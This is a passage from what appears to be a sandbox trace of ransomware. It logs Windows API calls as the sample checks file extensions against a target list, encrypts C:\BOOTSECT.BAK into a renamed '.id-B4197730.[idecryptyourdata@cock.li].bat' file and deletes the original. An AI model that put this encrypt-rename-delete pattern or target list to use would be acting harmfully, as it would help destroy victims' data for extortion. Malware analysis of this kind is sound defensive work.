lpString2=".xml") returned -1 [0049.630] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0049.630] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0049.630] lstrlenW (lpString=".doc") returned 4 [0049.630] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0049.630] lstrlenW (lpString=".docx") returned 5 [0049.630] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0049.630] lstrlenW (lpString=".pdf") returned 4 [0049.630] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0049.631] lstrlenW (lpString=".xls") returned 4 [0049.631] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0049.631] lstrlenW (lpString=".xlsx") returned 5 [0049.631] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0049.631] lstrlenW (lpString=".ppt") returned 4 [0049.631] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0049.631] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0049.631] lstrlenW (lpString=".zip") returned 4 [0049.631] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0049.631] lstrlenW (lpString=".rar") returned 4 [0049.631] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0049.631] lstrlenW (lpString=".bz2") returned 4 [0049.631] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0049.631] lstrlenW (lpString=".7z") returned 3 [0049.631] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0049.631] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0049.631] lstrlenW (lpString=".dbf") returned 4 [0049.631] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0049.631] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0049.631] lstrlenW (lpString=".1cd") returned 4 [0049.631] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0049.631] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0049.631] lstrlenW (lpString=".jpg") returned 4 [0049.631] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0049.631] lstrcmpiW (lpString1=".BAK", lpString2=".bat") returned -1 [0049.631] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0049.631] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0049.631] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=8192) returned 1 [0049.632] CloseHandle (hObject=0x2dc) returned 1 [0049.632] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 0x27 [0049.632] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\bootsect.bak.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0049.632] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0049.632] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0049.632] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0049.632] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0049.632] CreateFileW (lpFileName="C:\\BOOTSECT.BAK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\bootsect.bak.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0054.031] GetLastError () returned 0x0 [0054.031] ReadFile (in: hFile=0x2dc, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x2000, lpOverlapped=0x0) returned 1 [0054.724] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x2010, lpOverlapped=0x0) returned 1 [0055.107] ReadFile (in: hFile=0x2dc, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0055.107] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0055.107] SetEndOfFile (hFile=0x2c0) returned 1 [0055.107] CloseHandle (hObject=0x2c0) returned 1 [0055.108] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0055.108] SetEndOfFile (hFile=0x2dc) returned 1 [0055.109] CloseHandle (hObject=0x2dc) returned 1 [0055.109] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x27) returned 1 [0055.109] DeleteFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 1 [0055.109] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0055.109] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0055.109] lstrlenW (lpString=".doc") returned 4 [0055.109] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0055.109] lstrlenW (lpString=".docx") returned 5 [0055.109] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0055.110] lstrlenW (lpString=".pdf") returned 4 [0055.110] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0055.110] lstrlenW (lpString=".xls") returned 4 [0055.110] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0055.110] lstrlenW (lpString=".xlsx") returned 5 [0055.110] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0055.110] lstrlenW (lpString=".ppt") returned 4 [0055.110] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0055.110] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0055.110] lstrlenW (lpString=".zip") returned 4 [0055.110] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0055.110] lstrlenW (lpString=".rar") returned 4 [0055.110] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0055.110] lstrlenW (lpString=".bz2") returned 4 [0055.110] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0055.110] lstrlenW (lpString=".7z") returned 3 [0055.110] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0055.110] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0055.110] lstrlenW (lpString=".dbf") returned 4 [0055.110] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0055.110] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0055.110] lstrlenW (lpString=".1cd") returned 4 [0055.110] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0055.110] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0055.110] lstrlenW (lpString=".jpg") returned 4 [0055.110] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0055.110] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0055.110] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0055.110] lstrlenW (lpString=".doc") returned 4 [0055.110] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0055.110] lstrlenW (lpString=".docx") returned 5 [0055.110] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0055.110] lstrlenW (lpString=".pdf") returned 4 [0055.110] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0055.111] lstrlenW (lpString=".xls") returned 4 [0055.111] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0055.111] lstrlenW (lpString=".xlsx") returned 5 [0055.111] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0055.111] lstrlenW (lpString=".ppt") returned 4 [0055.111] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0055.111] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0055.111] lstrlenW (lpString=".zip") returned 4 [0055.111] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0055.111] lstrlenW (lpString=".rar") returned 4 [0055.111] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0055.111] lstrlenW (lpString=".bz2") returned 4 [0055.111] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0055.111] lstrlenW (lpString=".7z") returned 3 [0055.111] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0055.111] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0055.111] lstrlenW (lpString=".dbf") returned 4 [0055.111] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0055.111] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0055.111] lstrlenW (lpString=".1cd") returned 4 [0055.111] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0055.111] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0055.111] lstrlenW (lpString=".jpg") returned 4 [0055.111] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0055.111] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0055.111] lstrlenW (lpString="Content.xml") returned 11 [0055.111] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0055.252] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=27045) returned 1 [0055.252] CloseHandle (hObject=0x2c0) returned 1 [0055.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0055.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0055.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0055.252] lstrlenW (lpString=".doc") returned 4 [0055.252] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.252] lstrlenW (lpString=".docx") returned 5 [0055.252] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0055.252] lstrlenW (lpString=".pdf") returned 4 [0055.252] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.252] lstrlenW (lpString=".xls") returned 4 [0055.252] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.252] lstrlenW (lpString=".xlsx") returned 5 [0055.253] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0055.253] lstrlenW (lpString=".ppt") returned 4 [0055.253] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0055.253] lstrlenW (lpString=".zip") returned 4 [0055.253] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.253] lstrlenW (lpString=".rar") returned 4 [0055.253] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.253] lstrlenW (lpString=".bz2") returned 4 [0055.253] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.253] lstrlenW (lpString=".7z") returned 3 [0055.253] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0055.253] lstrlenW (lpString=".dbf") returned 4 [0055.253] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0055.253] lstrlenW (lpString=".1cd") returned 4 [0055.253] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0055.253] lstrlenW (lpString=".jpg") returned 4 [0055.253] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0055.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0055.253] lstrlenW (lpString=".doc") returned 4 [0055.253] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.253] lstrlenW (lpString=".docx") returned 5 [0055.253] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0055.253] lstrlenW (lpString=".pdf") returned 4 [0055.253] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.253] lstrlenW (lpString=".xls") returned 4 [0055.254] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.254] lstrlenW (lpString=".xlsx") returned 5 [0055.254] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0055.254] lstrlenW (lpString=".ppt") returned 4 [0055.254] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0055.254] lstrlenW (lpString=".zip") returned 4 [0055.254] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.254] lstrlenW (lpString=".rar") returned 4 [0055.254] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.254] lstrlenW (lpString=".bz2") returned 4 [0055.254] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.254] lstrlenW (lpString=".7z") returned 3 [0055.254] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0055.254] lstrlenW (lpString=".dbf") returned 4 [0055.254] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0055.254] lstrlenW (lpString=".1cd") returned 4 [0055.254] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0055.254] lstrlenW (lpString=".jpg") returned 4 [0055.254] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.254] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0055.254] lstrlenW (lpString="boxed-delete.avi") returned 16 [0055.254] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0055.326] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=48936) returned 1 [0055.326] CloseHandle (hObject=0x334) returned 1 [0055.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0055.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.326] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0055.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0055.326] lstrlenW (lpString=".doc") returned 4 [0055.326] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.326] lstrlenW (lpString=".docx") returned 5 [0055.326] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0055.326] lstrlenW (lpString=".pdf") returned 4 [0055.326] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.326] lstrlenW (lpString=".xls") returned 4 [0055.326] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.326] lstrlenW (lpString=".xlsx") returned 5 [0055.326] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0055.326] lstrlenW (lpString=".ppt") returned 4 [0055.327] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0055.327] lstrlenW (lpString=".zip") returned 4 [0055.327] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.327] lstrlenW (lpString=".rar") returned 4 [0055.327] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.327] lstrlenW (lpString=".bz2") returned 4 [0055.327] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.327] lstrlenW (lpString=".7z") returned 3 [0055.327] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0055.327] lstrlenW (lpString=".dbf") returned 4 [0055.327] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0055.327] lstrlenW (lpString=".1cd") returned 4 [0055.327] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0055.327] lstrlenW (lpString=".jpg") returned 4 [0055.327] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0055.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0055.327] lstrlenW (lpString=".doc") returned 4 [0055.327] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.327] lstrlenW (lpString=".docx") returned 5 [0055.327] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0055.327] lstrlenW (lpString=".pdf") returned 4 [0055.327] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.327] lstrlenW (lpString=".xls") returned 4 [0055.328] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.328] lstrlenW (lpString=".xlsx") returned 5 [0055.328] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0055.328] lstrlenW (lpString=".ppt") returned 4 [0055.328] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0055.328] lstrlenW (lpString=".zip") returned 4 [0055.328] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.328] lstrlenW (lpString=".rar") returned 4 [0055.328] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.328] lstrlenW (lpString=".bz2") returned 4 [0055.328] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.328] lstrlenW (lpString=".7z") returned 3 [0055.328] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0055.328] lstrlenW (lpString=".dbf") returned 4 [0055.328] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0055.328] lstrlenW (lpString=".1cd") returned 4 [0055.328] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0055.328] lstrlenW (lpString=".jpg") returned 4 [0055.328] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.328] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0055.329] lstrlenW (lpString="boxed-join.avi") returned 14 [0055.329] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0055.362] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=46622) returned 1 [0055.363] CloseHandle (hObject=0x2c0) returned 1 [0055.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0055.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.363] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0055.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0055.363] lstrlenW (lpString=".doc") returned 4 [0055.363] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.363] lstrlenW (lpString=".docx") returned 5 [0055.363] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0055.363] lstrlenW (lpString=".pdf") returned 4 [0055.363] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.363] lstrlenW (lpString=".xls") returned 4 [0055.363] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.363] lstrlenW (lpString=".xlsx") returned 5 [0055.363] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0055.364] lstrlenW (lpString=".ppt") returned 4 [0055.364] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0055.364] lstrlenW (lpString=".zip") returned 4 [0055.364] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.364] lstrlenW (lpString=".rar") returned 4 [0055.364] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.364] lstrlenW (lpString=".bz2") returned 4 [0055.364] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.364] lstrlenW (lpString=".7z") returned 3 [0055.364] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0055.364] lstrlenW (lpString=".dbf") returned 4 [0055.364] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0055.364] lstrlenW (lpString=".1cd") returned 4 [0055.364] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0055.364] lstrlenW (lpString=".jpg") returned 4 [0055.364] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0055.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0055.364] lstrlenW (lpString=".doc") returned 4 [0055.364] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.364] lstrlenW (lpString=".docx") returned 5 [0055.364] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0055.364] lstrlenW (lpString=".pdf") returned 4 [0055.365] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.365] lstrlenW (lpString=".xls") returned 4 [0055.365] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.365] lstrlenW (lpString=".xlsx") returned 5 [0055.365] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0055.365] lstrlenW (lpString=".ppt") returned 4 [0055.365] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0055.365] lstrlenW (lpString=".zip") returned 4 [0055.365] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.365] lstrlenW (lpString=".rar") returned 4 [0055.365] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.365] lstrlenW (lpString=".bz2") returned 4 [0055.365] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.365] lstrlenW (lpString=".7z") returned 3 [0055.365] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0055.365] lstrlenW (lpString=".dbf") returned 4 [0055.365] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0055.365] lstrlenW (lpString=".1cd") returned 4 [0055.365] 